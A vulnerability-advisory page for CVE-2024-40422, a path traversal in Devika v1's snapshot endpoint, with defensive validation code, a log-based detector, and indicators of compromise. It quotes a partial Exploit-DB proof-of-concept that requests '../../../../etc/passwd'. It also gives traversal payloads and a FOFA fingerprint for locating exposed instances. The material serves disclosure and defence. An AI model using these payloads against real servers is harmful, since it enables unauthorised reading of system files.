CVE-2024-40422
Published: 2024-07-24
Priority: P2 (71) · Severity: critical · CVSS 3.1 base score 9.1
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Exploit: public (Exploit-DB entry below)
EPSS: 11.41% (95.5th percentile)
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
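The root cause described above is a user-supplied path that is joined onto a snapshots directory without confining the result to that directory. The following is an added example of a defensive path-validation routine, not Devika's own code and not the fix in the linked pull request (whose contents are not on this page); the snapshot directory location is an assumption. It decodes percent-encoding, normalises backslashes so Windows-hosted instances are covered too, rejects absolute paths and NUL bytes, and only then resolves the candidate with realpath and checks it still lies inside the base directory.

```python
import os
import urllib.parse
from typing import Optional

# Assumed directory in which browser snapshots are stored; the real
# location is configured by the application and is not stated on this page.
SNAPSHOT_DIR = "/srv/devika/snapshots"


def resolve_snapshot_path(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute on-disk path for `requested` only if it names a
    file strictly inside `base_dir`; return None for anything else.

    Order matters: decode first (so `..%2F` is seen as `../`), normalise
    separators, reject obviously hostile forms, then let realpath collapse
    `..` and symlinks before the containment check."""
    decoded = urllib.parse.unquote(requested)
    if "\x00" in decoded:                      # NUL would truncate the path in C APIs
        return None
    decoded = decoded.replace("\\", "/")       # treat Windows separators as separators
    if decoded.startswith("/") or (len(decoded) > 1 and decoded[1] == ":"):
        return None                            # absolute POSIX path or drive letter
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate == base:
        return None                            # the directory itself is not a file
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                         # e.g. different drives on Windows
        inside = False
    return candidate if inside else None


if __name__ == "__main__":
    # Constructed inputs: the page's Linux payload, an encoded variant, the
    # Windows-style variant the page mentions, an absolute path, and two
    # legitimate relative names.
    for req in ("../../../../etc/passwd",
                "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
                "..\\..\\..\\..\\windows\\win.ini",
                "/etc/passwd",
                "run-42/page.png",
                "a/../b.png"):
        print(f"{req!r:45} -> {resolve_snapshot_path(SNAPSHOT_DIR, req)}")
```

The containment check is done on the resolved path rather than by searching the input for `..`, so a request that only looks traversal-like (`a/../b.png`) is still served, while anything that escapes the directory after resolution is refused regardless of how it was encoded.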
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| stitionai | devika | — | — |
Detection & IOCs (extracted from sources)
Nuclei template: GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd, matching on a response body that matches the regex root:.*:0:0: and a Content-Type header of application/octet-stream
- Detect exploitation attempts by monitoring HTTP GET requests to /api/get-browser-snapshot with a snapshot_path parameter containing directory traversal sequences (e.g., ../).
- Successful exploitation is indicated by a response body matching the regex root:.*:0:0: (Unix /etc/passwd content) and a Content-Type header of application/octet-stream with HTTP 200.
- Pre-exploitation fingerprinting of Devika instances can be detected by GET /api/data requests whose JSON response body contains the keys models, projects, OPENAI, and OLLAMA.
- Devika v1 instances exposed on the internet can be discovered via FOFA using the icon hash -1429839495; monitor for scanning activity targeting this fingerprint.
- The vulnerability requires no authentication (PR:N, UI:N); any unauthenticated GET request to the snapshot endpoint with traversal sequences should be treated as an attack attempt.
- The path traversal payload shown targets Linux/Unix systems (/etc/passwd). The exploit was tested on Windows 11, so Windows-specific traversal paths (e.g., ..\..\..\..\windows\win.ini) may also be viable against Windows-hosted instances.
- The vulnerability affects specifically Devika v1 (cpe:2.3:a:stitionai:devika:1.0). Versions beyond v1 that patch this issue should not be affected.
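The first, second and last-but-two points above (traversal sequences in the snapshot_path query parameter, HTTP 200 with application/octet-stream, and unauthenticated GETs) can be checked directly against web-server access logs. The following is an added example, not a rule from any of the indexed sources: it runs over constructed sample lines in Apache combined-log format with the response Content-Type appended (what a `LogFormat` ending in `"%{Content-Type}o"` produces), normalises percent-encoding and backslashes before testing for `..` segments, and grades each hit as an attempt or a likely success.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample traffic (not real logs): one benign request, three
# traversal attempts in different encodings, and one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jul/2024:10:01:02 +0000] "GET /api/get-browser-snapshot?snapshot_path=run-7/page.png HTTP/1.1" 200 51234 "-" "Mozilla/5.0" "image/png"
203.0.113.9 - - [24/Jul/2024:10:01:15 +0000] "GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1" 200 1822 "-" "python-requests/2.31.0" "application/octet-stream"
203.0.113.9 - - [24/Jul/2024:10:01:16 +0000] "GET /api/get-browser-snapshot?snapshot_path=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 0 "-" "python-requests/2.31.0" "text/html"
203.0.113.9 - - [24/Jul/2024:10:01:17 +0000] "GET /api/get-browser-snapshot?snapshot_path=..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 200 92 "-" "python-requests/2.31.0" "application/octet-stream"
198.51.100.2 - - [24/Jul/2024:10:02:00 +0000] "GET /api/data HTTP/1.1" 200 640 "-" "curl/8.4.0" "application/json"
"""

# host ident user [time] "method target protocol" status bytes "referer" "ua" "content-type"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "[^"]*" "([^"]*)"$'
)
VULN_PATH = "/api/get-browser-snapshot"
# A `..` path segment after normalisation, at the start, middle or end.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


@dataclass
class Finding:
    src_ip: str
    param: str          # snapshot_path value as the server would see it
    status: int
    content_type: str
    verdict: str        # "attempt" or "likely-success"


def classify_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line is a traversal request to the
    vulnerable endpoint, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src_ip, method, target, status, ctype = m.groups()
    if method != "GET":
        return None
    parts = urllib.parse.urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs already percent-decodes once; decode again to catch double
    # encoding, then fold backslashes so Windows-style payloads are caught.
    for value in urllib.parse.parse_qs(parts.query).get("snapshot_path", []):
        normalised = urllib.parse.unquote(value).replace("\\", "/")
        if TRAVERSAL_RE.search(normalised):
            code = int(status)
            success = code == 200 and ctype.startswith("application/octet-stream")
            return Finding(src_ip, value, code, ctype,
                           "likely-success" if success else "attempt")
    return None


def detect_traversal(lines: List[str]) -> List[Finding]:
    """Run classify_line over an iterable of log lines and collect hits."""
    return [f for f in (classify_line(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for f in detect_traversal(SAMPLE_LOG.splitlines()):
        print(f"{f.verdict:15} {f.src_ip:12} {f.status} {f.content_type:25} {f.param}")
```

Access logs do not carry the response body, so the `root:.*:0:0:` body match from the second point above cannot be applied here; the status/Content-Type pairing is the strongest signal available at this layer, and a body-level check belongs in a proxy or WAF that sees responses. The /api/data fingerprinting in the third point is likewise a body-level indicator and is deliberately not flagged by this rule.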
No detection rules found.
Exploit-DB
Devika v1 - Path Traversal via 'snapshot_path' (exploitdb · 2024-08-04 · CVSS 9.1, critical)
```python
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422
#!/usr/bin/python
import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }
    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target',
```
Nuclei
Devika v1 - Path Traversal (nuclei · CVSS 9.1, critical)
Template:
```yaml
id: CVE-2024-40422
info:
  name: Devika v1 - Path Traversal
  author: s4e-io,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the
```
No writeups or analysis indexed.
References
- https://github.com/alpernae/CVE-2024-40422
- https://github.com/stitionai/devika
- https://github.com/stitionai/devika/pull/619
- https://medium.com/@alpernae/uncovering-path-traversal-in-devika-v1-a-deep-dive-into-cve-2024-40422-f8ce81398b99